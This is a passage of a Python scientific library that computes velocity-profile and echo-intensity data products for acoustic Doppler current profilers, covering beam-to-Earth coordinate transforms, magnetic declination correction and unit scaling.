b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [daPa]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
_, vv_cor = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
vv_cor = vv_cor / 1000. # mm/s -> m/s
# return the Northward Velocity Profile
return vv_cor
def adcp_beam_vertical(b1, b2, b3, b4, h, p, r, vf):
"""
Description:
Wrapper function to compute the Upward Velocity Profile (VELPROF-VLU)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
magnetic declination values calculated using the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
Usage:
ww_cor = adcp_beam_vertical(b1, b2, b3, b4, h, p, r, vf)
where
ww_cor = vertical velocity profiles (VELPROF-VLU_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
"""
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
_, _, ww = adcp_ins2earth(u, v, w, h, p, r, vf)
# scale upward velocity to m/s
ww = ww / 1000. # mm/s -> m/s
# return the Upward Velocity Profile
return ww
def adcp_beam_error(b1, b2, b3, b4):
"""
Description:
Wrapper function to compute the Error Velocity Profile (VELPROF-ERR)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2015-06-10: <NAME>.
Moved the conditioning of input beam velocities to adcp_beam2inst.
Usage:
ww_cor = adcp_beam_error(b1, b2, b3, b4)
where
e = Error velocity profiles (VELPROF-ERR_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
"""
# compute the beam to instrument transform
_, _, _, e = adcp_beam2ins(b1, b2, b3, b4)
# scale error velocity to m/s
e = e / 1000. # mm/s
# return the Error Velocity Profile
return e
# Wrapper functions to create the VELPROF L1 data products for instruments
# programmed in Earth coordinates by CGSN (Pioneer and Endurance) (ADCPA,
# ADCPS-J,L,N and ADCPT-C,F,G,M)
def adcp_earth_eastward(u, v, z, lat, lon, dt):
"""
Description:
Wrapper function to compute the Eastward Velocity Profile (VELPROF-VLE)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
magnetic declination values calculated use the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
Removed the depth dependence from the magnetic declination.
2015-06-25: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
uu_cor = adcp_earth_eastward(u, v, z, lat, lon, dt)
where
uu_cor = eastward velocity profiles in Earth coordinates corrected for
the magnetic declination (VELPROF-VLE_L1) [m s-1]
u = Eastward velocity profiles (VELPROF-VLE_L0) [mm s-1]
v = Northward velocity profiles (VELPROF-VLN_L0) [mm s-1]
z = instrument's pressure sensor reading (depth) [daPa]
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays
u = np.atleast_2d(u)
v = np.atleast_2d(v)
# on input, the elements of u and v are of type int.
u, v = replace_fill_with_nan(ADCP_FILLVALUE, u, v)
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
uu_cor, _ = magnetic_correction(theta, u, v)
# scale velocity to m/s
uu_cor = uu_cor / 1000. # mm/s -> m/s
# return the Eastward Velocity Profile
return uu_cor
def adcp_earth_northward(u, v, z, lat, lon, dt):
"""
Description:
Wrapper function to compute the Northward Velocity Profile (VELPROF-VLN)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
magnetic declination values calculated use the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
Removed the depth dependence from the magnetic declination.
2015-06-25: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
vv_cor = adcp_earth_northward(u, v, z, lat, lon, dt)
where
vv_cor = northward velocity profiles in Earth coordinates corrected for
the magnetic declination (VELPROF-VLN_L1) [m s-1]
u = Eastward velocity profiles (VELPROF-VLE_L0) [mm s-1]
v = Northward velocity profiles (VELPROF-VLN_L0) [mm s-1]
z = instrument's pressure sensor reading (depth) [daPa]
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays
u = np.atleast_2d(u)
v = np.atleast_2d(v)
# on input, the elements of u and v are of type int.
u, v = replace_fill_with_nan(ADCP_FILLVALUE, u, v)
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
_, vv_cor = magnetic_correction(theta, u, v)
# scale velocity to m/s
vv_cor = vv_cor / 1000. # mm/s -> m/s
# return the Northward Velocity Profile
return vv_cor
def adcp_earth_vertical(w):
"""
Description:
Wrapper function to compute the Upward Velocity Profile (VELPROF-VLU)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2014-06-25: <NAME>. Initial code.
2015-06-25: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
w_scl = adcp_earth_vertical(w)
where
w_scl = scaled upward velocity profiles in Earth coordinates
(VELPROF-VLN_L1) [m s-1]
w = upward velocity profiles (VELPROF-VLU_L0) [mm s-1]
"""
w = replace_fill_with_nan(ADCP_FILLVALUE, w)
# scale velocity to m/s
w_scl = w / 1000. # mm/s -> m/s
# return the Upward Velocity Profile
return w_scl
def adcp_earth_error(e):
"""
Description:
Wrapper function to compute the Error Velocity Profile (VELPROF-ERR)
from Earth coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2014-06-25: <NAME>. Initial code.
2015-06-25: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
e_scl = adcp_earth_vertical(w)
where
e_scl = scaled error velocity profiles in Earth coordinates
(VELPROF-ERR_L1) [m s-1]
e = error velocity profiles (VELPROF-ERR_L0) [mm s-1]
"""
e = replace_fill_with_nan(ADCP_FILLVALUE, e)
# scale velocity to m/s
e_scl = e / 1000. # mm/s -> m/s
# return the scaled Error Velocity Profile
return e_scl
# Compute the VELTURB_L1 data products for the VADCP instrument deployed by RSN.
def vadcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Eastward Velocity Profile (VELTURB-VLE)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Turbulent Velocity Profile and Echo Intensity -
DCN 1341-00760.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
uu_cor = vadcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
uu_cor = east velocity profiles in Earth coordinates corrected for the
magnetic declination (VELTURB-VLE_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [daPa]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
uu_cor, _ = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
uu_cor = uu_cor / 1000. # mm/s -> m/s
# return the Eastward Velocity Profile
return uu_cor
def vadcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Northward Velocity Profile
(VELTURB-VLN) from beam coordinate transformed velocity profiles as
defined in the Data Product Specification for Turbulent Velocity
Profile and Echo Intensity - DCN 1341-00760.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
vv_cor = vadcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
vv_cor = north velocity profiles in Earth coordinates corrected for the
magnetic declination (VELTURB-VLN_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [dm]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... corect for it
_, vv_cor = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
vv_cor = vv_cor / 1000. # mm/s -> m/s
# return the Northward Velocity Profile
return vv_cor
def vadcp_beam_vertical_est(b1, b2, b3, b4, h, p, r, vf):
"""
Description:
Wrapper function to compute the "estimated" Upward Velocity Profile
(VELTURB-VLU-4BM) from the beam coordinate transformed velocity profiles as
defined in the Data Product Specification for Turbulent Velocity
Profile and Echo Intensity - DCN 1341-00760. This provides the
traditional estimate of the vertical velocity component from a 4 beam
solution, where each beam is facing outward at an angle (20 degrees)
relative to the vertical.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
2015-06-22: <NAME>. Renamed this data product.
Usage:
ww_est = vadcp_beam_vertical_est(b1, b2, b3, b4, h, p, r, vf)
where
ww_est = estimated vertical velocity profiles in Earth coordinates
(VELTURB-VLU-4BM_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
"""
# compute the beam to instrument transform
u, v, w, _ = adcp_beam2ins(b1, b2, b3, b4)
# compute the instrument to earth beam transform
_, _, ww = adcp_ins2earth(u, v, w, h, p, r, vf)
# scale upward velocity to m/s
ww = ww / 1000. # mm/s -> m/s
# return the estimated Upward Velocity Profile
return ww
def vadcp_beam_vertical_true(b1, b2, b3, b4, b5, h, p, r, vf):
"""
Description:
Wrapper function to compute the "true" Upward Velocity Profile
(VELTURB-VLU-5BM) from the beam coordinate transformed velocity profiles as
defined in the Data Product Specification for Turbulent Velocity
Profile and Echo Intensity - DCN 1341-00760. This is assumed to provide
a better estimate of the true vertical velocity component, since beam 5
is pointing directly up.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
2015-06-22: <NAME>. Renamed this data product.
2015-06-25: <NAME>. Incorporated b5 int fillvalue -> Nan.
Usage:
ww_true = vadcp_beam_vertical_true(b1, b2, b3, b4, b5, h, p, r, vf)
where
ww_true = true vertical velocity profiles in Earth coordinates
(VELTURB-VLU-5BM_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
b5 = "beam 5" velocity profiles in beam coordinates (VELTURB-B5_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
"""
# compute the beam to instrument transform
# fill values in the 4 beams are checked for inside adcp_beam2ins
u, v, _, _ = adcp_beam2ins(b1, b2, b3, b4)
# check b5 for the presence of fill values
b5 = replace_fill_with_nan(ADCP_FILLVALUE, b5)
# compute the instrument to earth beam transform
# fill values in the adcp orientation parameters are checked for inside adcp_ins2earth
_, _, ww = adcp_ins2earth(u, v, b5, h, p, r, vf)
# scale upward velocity to m/s
ww = ww / 1000. # mm/s -> m/s
# return the true Upward Velocity Profile
return ww
def vadcp_beam_error(b1, b2, b3, b4):
"""
Description:
Wrapper function to compute the Error Velocity Profile (VELTURB-ERR)
from the beam coordinate transformed velocity profiles as defined in
the Data Product Specification for Turbulent Velocity Profile and Echo
Intensity - DCN 1341-00760.
Implemented by:
2014-06-25: <NAME>. Initial code, based on existing ADCP
2015-06-10: <NAME>.
Moved the conditioning of input beam velocities to adcp_beam2inst.
Usage:
e = vadcp_beam_northward(b1, b2, b3, b4)
where
e = error velocity profiles (VELTURB-ERR_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELTURB-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELTURB-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELTURB-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELTURB-B4_L0) [mm s-1]
"""
# compute the beam to instrument transform
_, _, _, e = adcp_beam2ins(b1, b2, b3, b4)
# scale error velocity to m/s
e = e / 1000. # mm/s
# return the Error Velocity Profile
return e
# Calculates ECHOINT_L1 for all tRDI ADCPs
def adcp_backscatter(raw, sfactor):
"""
Description:
Converts the echo intensity data from counts to dB using a factory
specified scale factor (nominally 0.45 dB/count for the Workhorse
family of ADCPs and 0.61 dB/count for the ExplorerDVL family). As
defined in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2014-04-21: <NAME>. Initial code.
2015-06-25: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
dB = adcp_backscatter(raw, sfactor)
where
dB = Relative Echo Intensity (ECHOINT_L1) [dB]
raw = raw echo intensity (ECHOINT_L0) [count]
sfactor = factory supplied scale factor, instrument and beam specific [dB/count]
Notes:
The ADCP outputs the raw echo intensity as a 1-byte integer, so the ADCP_FILLVALUE
cannot apply (requires 2 bytes).
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00050_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
if np.isscalar(sfactor) is False:
sfactor = sfactor.reshape(sfactor.shape[0], 1)
# check raw for the presence of system fill values
raw = replace_fill_with_nan(None, raw)
dB = raw * sfactor
return dB
##### ADCP Beam to Earth Transforms and Magnetic Variation Corrections
def adcp_beam2ins(b1, b2, b3, b4):
"""
Description:
This function converts the Beam Coordinate transformed velocity
profiles to the instrument coordinate system. The calculations are
defined in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2015-06-24: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
u, v, w, e = adcp_beam2ins(b1, b2, b3, b4)
where
u = "east" velocity profiles in instrument coordinates [mm s-1]
v = "north" velocity profiles in instrument coordinates [mm s-1]
w = "vertical" velocity profiles in instrument coordinates [mm s-1]
e = "error" velocity profiles [mm s-1]
b1 = "beam 1" velocity profiles in beam coordinates [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates [mm s-1]
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00050_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
b1 = np.atleast_2d(b1)
b2 = np.atleast_2d(b2)
b3 = np.atleast_2d(b3)
b4 = np.atleast_2d(b4)
b1, b2, b3, b4 = replace_fill_with_nan(ADCP_FILLVALUE, b1, b2, b3, b4)
theta = 20.0 / 180.0 * np.pi
a = 1.0 / (2.0 * np.sin(theta))
b = 1.0 / (4.0 * np.cos(theta))
c = 1.0 # +1.0 for convex transducer head, -1 for concave
d = a / np.sqrt(2.0)
u = c * a * (b1 - b2)
v = c * a * (b4 - b3)
w = b * (b1 + b2 + b3 + b4)
e = d * (b1 + b2 - b3 - b4)
return (u, v, w, e)
def adcp_ins2earth(u, v, w, heading, pitch, roll, vertical):
"""
Description:
This function converts the Instrument Coordinate transformed velocity
profiles to the Earth coordinate system. The calculation is defined in
the Data Product Specification for Velocity Profile and Echo Intensity
- DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-04-04: <NAME>. Optimized code performance by replacing the for
loops previously used to calculate vectorized matrix multiplication
products with calls to np.einsum (numpy Einstein summation function).
2015-06-24: <NAME>. Changed implementation of 'vertical' in the roll
calculation so that if these values are equal to the CI fill value
(-999999999), when these fill values are replaced with nans, the nans
will propagate through to the data product output.
2015-06-24: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
uu, vu, ww = adcp_ins2earth(u, v, w, heading, pitch, roll, vertical)
where
uu = "east" velocity profiles in earth coordinates [mm s-1]
vv = "north" velocity profiles in earth coordinates [mm s-1]
ww = "vertical" velocity profiles in earth coordinates [mm s-1]
u = east velocity profiles in instrument coordinates [mm s-1]
v = north velocity profiles in instrument coordinates [mm s-1]
w = vertical velocity profiles in instrument coordinates [mm s-1]
heading = instrument's uncorrected magnetic heading [centidegrees]
pitch = instrument pitch [centidegrees]
roll = instrument roll [centidegrees]
vertical = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00050_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
### the input beam data for adcp_ins2earth are always called using the output
### of adcp_beam2ins, so the following lines are not needed.
# insure we are dealing with array inputs
#u = np.atleast_2d(u)
#v = np.atleast_2d(v)
#w = np.atleast_2d(w)
# check for CI fill values before changing units.
# this function 'conditions' (np.atleast_1d) its inputs.
# TRDI does not apply its ADCP fill/bad value sentinels to compass data.
heading, pitch, roll, vertical = replace_fill_with_nan(None, heading, pitch, roll, vertical)
# change units from centidegrees to degrees
heading = heading / 100.0
pitch = pitch / 100.0
roll = roll / 100.0
# better way to calculate roll from the vertical orientation toggle;
# this will propagate R as nans if the vertical variable is missing from the data.
R = roll + vertical * 180.0
# roll
Rrad = np.radians(R)
cos_R = np.cos(Rrad)
sin_R = np.sin(Rrad)
# heading
Hrad = np.radians(heading)
cos_H = np.cos(Hrad)
sin_H = np.sin(Hrad)
# pitch
t1rad = np.radians(pitch)
t2rad = np.radians(roll)
Prad = np.arctan(np.tan(t1rad) * np.cos(t2rad))
cos_P = np.cos(Prad)
sin_P = np.sin(Prad)
# determine array size
n_packets = u.shape[0]
n_uvw = u.shape[1]
# initialize vectors to be used as matrix elements
ones = np.ones(n_packets)
zeros = ones * 0.0
# the rollaxis calls reorient the matrices so that their lead index is
# the data packet index
M1 = np.array([[cos_H, sin_H, zeros],
[-sin_H, cos_H, zeros],
[zeros, zeros, ones]])
M1 = np.rollaxis(M1, 2)
M2 = np.array([[ones, zeros, zeros],
[zeros, cos_P, -sin_P],
[zeros, sin_P, cos_P]])
M2 = np.rollaxis(M2, 2)
M3 = np.array([[cos_R, zeros, sin_R],
[zeros, ones, zeros],
[-sin_R, zeros, cos_R]])
M3 = np.rollaxis(M3, 2)
# construct input array of coordinates (velocities) to be transformed.
# the basis set is 3D (E,N,U) so that the middle dimension is sized at 3.
uvw = np.zeros((n_packets, 3, n_uvw))
# pack the coordinates (velocities) to be transformed into the appropriate
# slices.
uvw[:, 0, :] = u
uvw[:, 1, :] = v
uvw[:, 2, :] = w
# the Einstein summation is here configured to do the matrix
# multiplication MM(i,l) = M1(i,j) * M2(j,k) * M3(k,l) on each slice h.
MM = np.einsum('hij,hjk,hkl->hil', M1, M2, M3)
# the Einstein summation is here configured to do the matrix
# multiplication uvw_earth(i,m) = MM(i,l) * uvw(l,m) on each slice h.
uvw_earth = np.einsum('hil,hlm->him', MM, uvw)
# NOTE:
# these last two executable statements run about a factor of 2
# faster in the 10000 data packet performance tests versus combining
# these operations into the one statement:
# uvw_earth = np.einsum('hij,hjk,hkl,hlm->him', M1, M2, M3, uvw)
# break out the coordinate slices and return them
uu = uvw_earth[:, 0, :]
vv = uvw_earth[:, 1, :]
ww = uvw_earth[:, 2, :]
return (uu, vv, ww)
def magnetic_correction(theta, u, v):
"""
Description:
This function corrects velocity profiles for the magnetic variation
(declination) at the measurement location. The magnetic declination
is obtained from the 2010 World Magnetic Model (WMM2010) provided by
NOAA (see wmm_declination).
This version handles 'vectorized' input variables without using for
loops. It was specifically written to handle the case of a 1D array of
theta values, theta=f(i), with corresponding sets of 'u' and 'v' values
such that u=f(i,j) and v=f(i,j), where there are j 'u' and 'v' values
for each theta(i).
Implemented by:
2014-04-04: <NAME>. Initial code. This function is used to
calculate magnetic corrections by the functions contained
in this module instead of the function magnetic_correction
found in ion_functions.data.generic_functions.
2015-04-10: Russell Desiderio. Corrected a typo:
uv = np.atleast_2d(u) -> u = np.atleast_2d(u)
Usage:
u_cor, v_cor = magnetic_correction(theta, u, v)
where
u_cor = eastward velocity profiles, in earth coordinates, with
the correction for magnetic variation applied.
v_cor = northward velocity profiles, in earth coordinates,
with the correction for magnetic variation applied.
theta = magnetic variation based on location (latitude, longitude and
altitude) and date; units of theta are [degrees]
u = uncorrected eastward velocity profiles in earth coordinates
v = uncorrected northward velocity profiles in earth coordinates
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00750_Data_Product_SPEC_VELPROF_OOI.pdf)
OOI (2013). Data Product Specification for Turbulent Velocity Profile
and Echo Intensity. Document Control Number 1341-00760.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00760_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
# force shapes of inputs to arrays
theta = np.atleast_1d(theta)
u = np.atleast_2d(u)
v = np.atleast_2d(v)
theta_rad = np.radians(theta)
cosT = np.cos(theta_rad)
sinT = np.sin(theta_rad)
M = np.array([[cosT, sinT],
[-sinT, cosT]])
# roll axes so that the lead index represents data packet #.
M = np.rollaxis(M, 2)
# the coordinate system is 2D, so the middle dimension is sized at 2.
uv = np.zeros((u.shape[0], 2, u.shape[1]))
# pack the coordinates to be rotated into the appropriate slices
uv[:, 0, :] = u
uv[:, 1, :] = v
# the Einstein summation is here configured to do the matrix
# multiplication uv_cor(i,k) = M(i,j) * uv(j,k) on each slice h.
uv_cor = np.einsum('hij,hjk->hik', M, uv)
# the magnetically corrected u values are:
u_cor = uv_cor[:, 0, :]
# the magnetically corrected v values are:
v_cor = uv_cor[:, 1, :]
# return corrected u and v values
return (u_cor, v_cor)
def adcp_bin_depths_bar(dist_first_bin, bin_size, num_bins, pressure, adcp_orientation, latitude):
"""
Description:
Calculates the center bin depths for PD0 and PD12 ADCP data. As defined
in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2015-01-29: <NAME>. Initial code.
2015-06-26: <NAME>. Fixed the handling of the pressure variables.
Time-vectorized the code by finessing the conditional.
2015-06-30: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
bin_depths = adcp_bin_depths(dist_first_bin, bin_size, num_bins, pressure,
adcp_orientation, latitude)
where
bin_depths = [meters]
dist_first_bin = distance to the first ADCP bin [centimeters]
bin_size = depth of each ADCP bin [centimeters]
num_bins = number of ADCP bins [unitless]
pressure = pressure at the sensor head [bar]
adcp_orientation = 1=upward looking or 0=downward looking [unitless]
latitude = latitude of the instrument [degrees]
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00050_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
# check for CI fill values.
pressure = replace_fill_with_nan(None, pressure)
# Convert pressure from bar to decibar
